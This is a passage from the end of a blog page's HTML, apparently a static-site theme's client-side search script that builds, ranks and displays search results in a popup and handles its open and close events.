                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  
  

  

  

  

</body>
</html>
